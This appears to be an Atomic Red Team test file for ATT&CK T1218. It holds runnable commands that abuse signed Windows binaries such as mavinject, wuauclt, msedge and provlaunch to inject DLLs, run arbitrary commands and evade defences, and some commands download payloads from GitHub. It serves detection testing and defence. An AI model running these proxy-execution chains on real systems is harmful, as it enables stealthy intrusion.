attack_technique: T1218 display_name: Signed Binary Proxy Execution atomic_tests: - name: mavinject - Inject DLL into running process auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 description: | Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. supported_platforms: - windows input_arguments: process_id: description: PID of process receiving injection type: string default: "1000" dll_payload: description: DLL to inject type: path default: PathToAtomicsFolder\T1218\src\x64\T1218.dll dependency_executor_name: powershell dependencies: - description: | T1218.dll must exist on disk at specified location (#{dll_payload}) prereq_command: | if (Test-Path "#{dll_payload}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: | mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}" name: command_prompt elevation_required: true - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: | Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB supported_platforms: - windows input_arguments: dll_payload: description: DLL to execute type: path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll dependency_executor_name: powershell dependencies: - description: | T1218-2.dll must exist on disk at specified location (#{dll_payload}) prereq_command: | if (Test-Path "#{dll_payload}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: | C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}" name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef description: | Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml supported_platforms: - windows input_arguments: inf_to_execute: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf dependency_executor_name: powershell dependencies: - description: | INF file must exist on disk at specified location (#{inf_to_execute}) prereq_command: | if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: | InfDefaultInstall.exe "#{inf_to_execute}" name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 description: | Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. supported_platforms: - windows input_arguments: remote_url: description: url to document type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx dependency_executor_name: powershell dependencies: - description: | Microsoft Word must be installed prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" Stop-Process -Name "winword" exit 0 } catch { exit 1 } get_prereq_command: | Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: name: command_prompt elevation_required: false command: | FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" - name: Microsoft.Workflow.Compiler.exe Payload Execution auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e description: | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: - windows input_arguments: xml_payload: description: XML to execution type: path default: PathToAtomicsFolder\T1218\src\T1218.xml mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe type: path default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 mwcname: description: Default name of microsoft.workflow.compiler.exe type: path default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: | .Net must be installed for this test to work correctly. prereq_command: | if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} get_prereq_command: | write-host ".Net must be installed for this test to work correctly." executor: command: | #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 description: | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: - windows input_arguments: xml_payload: description: XML to execution type: path default: PathToAtomicsFolder\T1218\src\T1218.xml renamed_binary: description: renamed Microsoft.Workflow.Compiler type: path default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe type: path default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 mwcname: description: Default name of microsoft.workflow.compiler.exe type: path default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: | .Net must be installed for this test to work correctly. prereq_command: | if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force executor: command: | &"#{renamed_binary}" "#{xml_payload}" output.txt name: powershell elevation_required: false - name: Invoke-ATHRemoteFXvGPUDisablementCommand base test auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db description: | RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 supported_platforms: - windows input_arguments: module_name: description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. type: string default: foo module_path: description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. type: string default: $PWD dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module. prereq_command: |- $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} get_prereq_command: | Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' name: powershell - name: DiskShadow Command Execution auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa description: | Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ supported_platforms: - windows input_arguments: txt_payload: description: txt to execute type: path default: PathToAtomicsFolder\T1218\src\T1218.txt dspath: description: Default location of DiskShadow.exe type: path default: C:\Windows\System32\diskshadow.exe dependency_executor_name: powershell dependencies: - description: txt file must exist on disk at specified location (#{txt_payload}) prereq_command: | if (Test-Path "#{txt_payload}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" - description: DiskShadow.exe must exist on disk at specified location (#{dspath}) prereq_command: | if (Test-Path #{dspath}) {exit 0} else {exit 1} get_prereq_command: | echo "DiskShadow.exe not found on disk at expected location" executor: command: | #{dspath} -S #{txt_payload} name: powershell elevation_required: false - name: Load Arbitrary DLL via Wuauclt (Windows Update Client) auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8 description: | This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ supported_platforms: - windows input_arguments: arbitrary_dll: description: Path of DLL to be loaded type: string default: PathToAtomicsFolder\T1218\bin\calc.dll dependency_executor_name: powershell dependencies: - description: | DLL to load must exist on disk as specified location (#{arbitrary_dll}) prereq_command: | if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}" executor: command: | wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer cleanup_command: |- taskkill /f /im calculator.exe > nul 2>&1 name: command_prompt - name: Lolbin Gpscript logon option auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c description: | Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - windows executor: command: | Gpscript /logon name: command_prompt - name: Lolbin Gpscript startup option auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 description: | Executes startup scripts configured in Group Policy https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - windows executor: command: | Gpscript /startup name: command_prompt - name: Lolbas ie4uinit.exe use as proxy auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3 description: | Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ supported_platforms: - windows input_arguments: Path_inf: description: Path to the cab file type: path default: PathToAtomicsFolder\T1218\src\ieuinit.inf Path_ie4uinit: description: Path to ie4uinit.exe type: path default: c:\windows\system32\ie4uinit.exe dependency_executor_name: powershell dependencies: - description: | ieuinit.inf must exist on disk at specified location (#{Path_inf}) prereq_command: | if (Test-Path "#{Path_inf}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}" executor: command: | copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe copy "#{Path_inf}" %TEMP%\ieuinit.inf %TEMP%\ie4uinit.exe -BaseSettings cleanup_command: | del %TEMP%\ie4uinit.exe >nul 2>&1 del %TEMP%\ieuinit.inf >nul 2>&1 name: command_prompt - name: LOLBAS CustomShellHost to Spawn Process auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe description: | This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/) [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins) supported_platforms: - windows input_arguments: dest_path: description: Directory to copy files into type: path default: C:\test executor: command: | if (-not (Test-Path #{dest_path})) { New-Item -Path #{dest_path} -ItemType Directory } else { Write-Host "Directory #{dest_path} already exists." } Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force #{dest_path}\customshellhost.exe cleanup_command: | Remove-Item -Path #{dest_path} -Recurse -Force name: powershell elevation_required: true - name: Provlaunch.exe Executes Arbitrary Command via Registry Key auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc description: | Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command. - https://twitter.com/0gtweet/status/1674399582162153472 - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ Registry keys are deleted after successful execution. supported_platforms: - windows executor: command: | reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe c:\windows\system32\provlaunch.exe LOLBin name: command_prompt - name: LOLBAS Msedge to Spawn Process auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349 description: | Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ supported_platforms: - windows executor: command: | $edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe" if (Test-Path $edgePath64) { $edgePath = $edgePath64 } else { # Check 32-bit Edge installation path $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" if (Test-Path $edgePath32) { $edgePath = $edgePath32 } else { exit 1 } } & $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&" sleep 5 taskkill -f -im msedge.exe taskkill -f -im calc.exe taskkill -f -im win32calc.exe name: powershell - name: System Binary Proxy Execution - Wlrmdr Lolbin auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71 description: Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures supported_platforms: - windows input_arguments: payload_path: description: Path to the executable type: String default: C:\Windows\System32\calc.exe executor: command: wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}" name: powershell elevation_required: false